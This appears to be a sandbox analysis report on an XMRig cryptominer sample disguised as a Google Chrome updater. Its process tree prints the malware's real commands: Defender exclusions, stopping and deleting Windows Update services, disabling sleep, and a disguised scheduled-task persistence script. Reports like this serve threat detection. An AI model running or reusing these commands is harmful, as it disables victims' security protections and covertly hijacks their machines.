xmrig | 7687dc9e1f582c340a6ce1ffdc1db7b273608e635177f53b65f3cde51f7cf65c

Analysis

max time kernel
150s
max time network
145s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
10/03/2023, 12:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e5714adf276ab96cff90d3778ba51b7e.exe
Size

3.6MB
MD5

e5714adf276ab96cff90d3778ba51b7e
SHA1

5627bdf380aafe2b131c70e5c857739101a6fac3
SHA256

7687dc9e1f582c340a6ce1ffdc1db7b273608e635177f53b65f3cde51f7cf65c
SHA512

4dfd0f0e21c8a1865d6acaac6d66761a5b5c31a2fa0ca8960ad498a81930ff31579a56ee4e666b59b31f117e5d078305a1dd50d0a75cdc2a04733364425753c2
SSDEEP

98304:ee4H3qxuFh/zHgR7vjnOy3cQ0/r0UoEpQg9Kdaud4F:+vbg5Oy6/r0Uhd9Kdpd4F

Score

10^/10

xmrig evasion miner upx

Malware Config

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs

description	pid	Process	procid_target
PID 1712 created 1228	1712	e5714adf276ab96cff90d3778ba51b7e.exe	16
PID 1712 created 1228	1712	e5714adf276ab96cff90d3778ba51b7e.exe	16
PID 1712 created 1228	1712	e5714adf276ab96cff90d3778ba51b7e.exe	16
PID 1712 created 1228	1712	e5714adf276ab96cff90d3778ba51b7e.exe	16
PID 1712 created 1228	1712	e5714adf276ab96cff90d3778ba51b7e.exe	16
PID 1636 created 1228	1636	updater.exe	16
PID 1636 created 1228	1636	updater.exe	16
PID 1636 created 1228	1636	updater.exe	16
PID 1636 created 1228	1636	updater.exe	16
PID 1636 created 1228	1636	updater.exe	16
PID 1636 created 1228	1636	updater.exe	16
PID 1736 created 1228	1736	conhost.exe	16
PID 1636 created 1228	1636	updater.exe	16

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 12 IoCs

miner

resource	yara_rule
behavioral1/memory/684-101-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/684-104-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/684-106-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/684-107-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/684-110-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/684-112-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/684-114-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/684-116-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/684-118-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/684-120-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/684-122-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/684-124-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\hosts	e5714adf276ab96cff90d3778ba51b7e.exe
File created	C:\Windows\System32\drivers\etc\hosts	updater.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Executes dropped EXE 1 IoCs

pid	Process
1636	updater.exe

Loads dropped DLL 1 IoCs

pid	Process
1928	taskeng.exe

UPX packed file 12 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/684-101-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/684-104-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/684-106-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/684-107-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/684-110-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/684-112-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/684-114-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/684-116-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/684-118-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/684-120-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/684-122-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/684-124-0x0000000140000000-0x00000001407F4000-memory.dmp	upx

Drops file in System32 directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1636 set thread context of 1736	1636	updater.exe	79
PID 1636 set thread context of 684	1636	updater.exe	86

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Chrome\updater.exe	e5714adf276ab96cff90d3778ba51b7e.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1688	sc.exe
1932	sc.exe
880	sc.exe
1976	sc.exe
1656	sc.exe
1976	sc.exe
1756	sc.exe
1460	sc.exe
1736	sc.exe
2036	sc.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1080	schtasks.exe
468	schtasks.exe

Modifies data under HKEY_USERS 7 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 4073618c5353d901	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CRLs	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CTLs	conhost.exe

Suspicious behavior: EnumeratesProcesses 31 IoCs

pid	Process
1712	e5714adf276ab96cff90d3778ba51b7e.exe
1712	e5714adf276ab96cff90d3778ba51b7e.exe
1072	powershell.exe
1712	e5714adf276ab96cff90d3778ba51b7e.exe
1712	e5714adf276ab96cff90d3778ba51b7e.exe
1712	e5714adf276ab96cff90d3778ba51b7e.exe
1712	e5714adf276ab96cff90d3778ba51b7e.exe
1712	e5714adf276ab96cff90d3778ba51b7e.exe
1712	e5714adf276ab96cff90d3778ba51b7e.exe
856	powershell.exe
1712	e5714adf276ab96cff90d3778ba51b7e.exe
1712	e5714adf276ab96cff90d3778ba51b7e.exe
1908	powershell.exe
1636	updater.exe
1636	updater.exe
1956	powershell.exe
1636	updater.exe
1636	updater.exe
1636	updater.exe
1636	updater.exe
1636	updater.exe
1636	updater.exe
968	powershell.exe
1636	updater.exe
1636	updater.exe
1636	updater.exe
1636	updater.exe
1736	conhost.exe
1736	conhost.exe
1636	updater.exe
1636	updater.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
460	Process not Found

Suspicious use of AdjustPrivilegeToken 39 IoCs

description	pid	Process
Token: SeDebugPrivilege	1072	powershell.exe
Token: SeShutdownPrivilege	864	powercfg.exe
Token: SeShutdownPrivilege	1528	powercfg.exe
Token: SeDebugPrivilege	856	powershell.exe
Token: SeShutdownPrivilege	820	powercfg.exe
Token: SeShutdownPrivilege	672	powercfg.exe
Token: SeDebugPrivilege	1908	powershell.exe
Token: SeDebugPrivilege	1956	powershell.exe
Token: SeShutdownPrivilege	1612	powercfg.exe
Token: SeShutdownPrivilege	1852	powercfg.exe
Token: SeDebugPrivilege	968	powershell.exe
Token: SeShutdownPrivilege	1796	powercfg.exe
Token: SeShutdownPrivilege	1748	powercfg.exe
Token: SeDebugPrivilege	1636	updater.exe
Token: SeAssignPrimaryTokenPrivilege	896	WMIC.exe
Token: SeIncreaseQuotaPrivilege	896	WMIC.exe
Token: SeSecurityPrivilege	896	WMIC.exe
Token: SeTakeOwnershipPrivilege	896	WMIC.exe
Token: SeLoadDriverPrivilege	896	WMIC.exe
Token: SeSystemtimePrivilege	896	WMIC.exe
Token: SeBackupPrivilege	896	WMIC.exe
Token: SeRestorePrivilege	896	WMIC.exe
Token: SeShutdownPrivilege	896	WMIC.exe
Token: SeSystemEnvironmentPrivilege	896	WMIC.exe
Token: SeUndockPrivilege	896	WMIC.exe
Token: SeManageVolumePrivilege	896	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	896	WMIC.exe
Token: SeIncreaseQuotaPrivilege	896	WMIC.exe
Token: SeSecurityPrivilege	896	WMIC.exe
Token: SeTakeOwnershipPrivilege	896	WMIC.exe
Token: SeLoadDriverPrivilege	896	WMIC.exe
Token: SeSystemtimePrivilege	896	WMIC.exe
Token: SeBackupPrivilege	896	WMIC.exe
Token: SeRestorePrivilege	896	WMIC.exe
Token: SeShutdownPrivilege	896	WMIC.exe
Token: SeSystemEnvironmentPrivilege	896	WMIC.exe
Token: SeUndockPrivilege	896	WMIC.exe
Token: SeManageVolumePrivilege	896	WMIC.exe
Token: SeLockMemoryPrivilege	684	conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 652 wrote to memory of 880	652	cmd.exe	36
PID 652 wrote to memory of 880	652	cmd.exe	36
PID 652 wrote to memory of 880	652	cmd.exe	36
PID 764 wrote to memory of 864	764	cmd.exe	37
PID 764 wrote to memory of 864	764	cmd.exe	37
PID 764 wrote to memory of 864	764	cmd.exe	37
PID 652 wrote to memory of 1976	652	cmd.exe	38
PID 652 wrote to memory of 1976	652	cmd.exe	38
PID 652 wrote to memory of 1976	652	cmd.exe	38
PID 652 wrote to memory of 1460	652	cmd.exe	39
PID 652 wrote to memory of 1460	652	cmd.exe	39
PID 652 wrote to memory of 1460	652	cmd.exe	39
PID 764 wrote to memory of 1528	764	cmd.exe	40
PID 764 wrote to memory of 1528	764	cmd.exe	40
PID 764 wrote to memory of 1528	764	cmd.exe	40
PID 652 wrote to memory of 1656	652	cmd.exe	41
PID 652 wrote to memory of 1656	652	cmd.exe	41
PID 652 wrote to memory of 1656	652	cmd.exe	41
PID 764 wrote to memory of 820	764	cmd.exe	42
PID 764 wrote to memory of 820	764	cmd.exe	42
PID 764 wrote to memory of 820	764	cmd.exe	42
PID 764 wrote to memory of 672	764	cmd.exe	43
PID 764 wrote to memory of 672	764	cmd.exe	43
PID 764 wrote to memory of 672	764	cmd.exe	43
PID 652 wrote to memory of 1736	652	cmd.exe	44
PID 652 wrote to memory of 1736	652	cmd.exe	44
PID 652 wrote to memory of 1736	652	cmd.exe	44
PID 652 wrote to memory of 1488	652	cmd.exe	45
PID 652 wrote to memory of 1488	652	cmd.exe	45
PID 652 wrote to memory of 1488	652	cmd.exe	45
PID 652 wrote to memory of 1704	652	cmd.exe	46
PID 652 wrote to memory of 1704	652	cmd.exe	46
PID 652 wrote to memory of 1704	652	cmd.exe	46
PID 856 wrote to memory of 1080	856	powershell.exe	47
PID 856 wrote to memory of 1080	856	powershell.exe	47
PID 856 wrote to memory of 1080	856	powershell.exe	47
PID 652 wrote to memory of 1340	652	cmd.exe	48
PID 652 wrote to memory of 1340	652	cmd.exe	48
PID 652 wrote to memory of 1340	652	cmd.exe	48
PID 652 wrote to memory of 1896	652	cmd.exe	49
PID 652 wrote to memory of 1896	652	cmd.exe	49
PID 652 wrote to memory of 1896	652	cmd.exe	49
PID 652 wrote to memory of 2020	652	cmd.exe	50
PID 652 wrote to memory of 2020	652	cmd.exe	50
PID 652 wrote to memory of 2020	652	cmd.exe	50
PID 1908 wrote to memory of 1640	1908	powershell.exe	53
PID 1908 wrote to memory of 1640	1908	powershell.exe	53
PID 1908 wrote to memory of 1640	1908	powershell.exe	53
PID 1928 wrote to memory of 1636	1928	taskeng.exe	55
PID 1928 wrote to memory of 1636	1928	taskeng.exe	55
PID 1928 wrote to memory of 1636	1928	taskeng.exe	55
PID 1200 wrote to memory of 2036	1200	cmd.exe	64
PID 1200 wrote to memory of 2036	1200	cmd.exe	64
PID 1200 wrote to memory of 2036	1200	cmd.exe	64
PID 1580 wrote to memory of 1612	1580	cmd.exe	65
PID 1580 wrote to memory of 1612	1580	cmd.exe	65
PID 1580 wrote to memory of 1612	1580	cmd.exe	65
PID 1200 wrote to memory of 1688	1200	cmd.exe	66
PID 1200 wrote to memory of 1688	1200	cmd.exe	66
PID 1200 wrote to memory of 1688	1200	cmd.exe	66
PID 1580 wrote to memory of 1852	1580	cmd.exe	67
PID 1580 wrote to memory of 1852	1580	cmd.exe	67
PID 1580 wrote to memory of 1852	1580	cmd.exe	67
PID 1580 wrote to memory of 1796	1580	cmd.exe	69

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1228
- C:\Users\Admin\AppData\Local\Temp\e5714adf276ab96cff90d3778ba51b7e.exe
  "C:\Users\Admin\AppData\Local\Temp\e5714adf276ab96cff90d3778ba51b7e.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in Drivers directory
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  PID:1712
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1072
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:652
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:880
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:1976
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1460
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:1656
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:1736
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:1488
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:1704
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    - Modifies security service
    PID:1340
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:1896
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:2020
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:764
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:864
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1528
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:820
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:672
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xpzzfzp#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:856
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
    3⤵
    - Creates scheduled task(s)
    PID:1080
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#tfnducb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1908
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
    3⤵
    PID:1640
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1956
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1200
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:2036
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:1688
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1976
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:1756
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:1932
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:1800
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:1604
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    PID:1600
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:1516
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:1012
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1580
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1612
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1852
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1796
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1748
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xpzzfzp#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:968
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
    3⤵
    - Creates scheduled task(s)
    PID:468
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe enhjtjceqq
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Suspicious behavior: EnumeratesProcesses
  PID:1736
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  2⤵
  - Drops file in Program Files directory
  PID:1280
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic PATH Win32_VideoController GET Name, VideoProcessor
    3⤵
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
    PID:896
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  2⤵
  - Drops file in Program Files directory
  PID:940
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe laqlphgirfhyyngj 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZe7ZXiwOLhA74FQzXCOhDuCEgX6WVRJena9L8fAOb/OCpbdBtftU9QMBxG8aHan0UHttTlDXmg8zTJWEzz1jyzM08ycWZiYcc5uJhds9Rh8+fDvfznlHAMreIYNxYX5k9xJHAc4B0ozcm5wxfAVR1NkkPB2hskLA90oq6EEwunLM+cHugrCZPmAL+xjChc1L0WUYPKljZ7G2hVhhzqEtgfjve5jiLrrwjfPxGeeAf9vve0gqrSPFO0K58xxNJ8ClGMWFD5JSZeWb9oJ+1bT+B66EYQJ/DUpMIB3mc6mheR6Uz+ZAzhdRWTbAqKAh0UuVcyH585aP1fgezLu1rTZuU+ONdhrRHHa5LNYPXLEE9VQc4O1CBkoqHonvDymgjUKbkFny/NdriyHYNCnaqXAUFBsl4P11o9bTzqhZekAP8RUmzlZiL9oK+TCU2oi2CBrYZ+cFhGlXxEFDSR6HvxTxKEz8AeOaHIGd5YzLX/uIE4og0LPZRMb6avDgM7T8uIlhBCKP5Sjpg7sgnkdrvB+eQRIA==
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:684

C:\Windows\system32\taskeng.exe
taskeng.exe {41A7EDD7-89A9-44AD-8E69-F8752166BA03} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1928
- C:\Program Files\Google\Chrome\updater.exe
  "C:\Program Files\Google\Chrome\updater.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1636

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe

Filesize
3.6MB

MD5
e5714adf276ab96cff90d3778ba51b7e

SHA1
5627bdf380aafe2b131c70e5c857739101a6fac3

SHA256
7687dc9e1f582c340a6ce1ffdc1db7b273608e635177f53b65f3cde51f7cf65c

SHA512
4dfd0f0e21c8a1865d6acaac6d66761a5b5c31a2fa0ca8960ad498a81930ff31579a56ee4e666b59b31f117e5d078305a1dd50d0a75cdc2a04733364425753c2

Download Submit
C:\Program Files\Google\Chrome\updater.exe

Filesize
3.6MB

MD5
e5714adf276ab96cff90d3778ba51b7e

SHA1
5627bdf380aafe2b131c70e5c857739101a6fac3

SHA256
7687dc9e1f582c340a6ce1ffdc1db7b273608e635177f53b65f3cde51f7cf65c

SHA512
4dfd0f0e21c8a1865d6acaac6d66761a5b5c31a2fa0ca8960ad498a81930ff31579a56ee4e666b59b31f117e5d078305a1dd50d0a75cdc2a04733364425753c2

Download Submit
C:\Program Files\Google\Libs\g.log

Filesize
198B

MD5
37dd19b2be4fa7635ad6a2f3238c4af1

SHA1
e5b2c034636b434faee84e82e3bce3a3d3561943

SHA256
8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07

SHA512
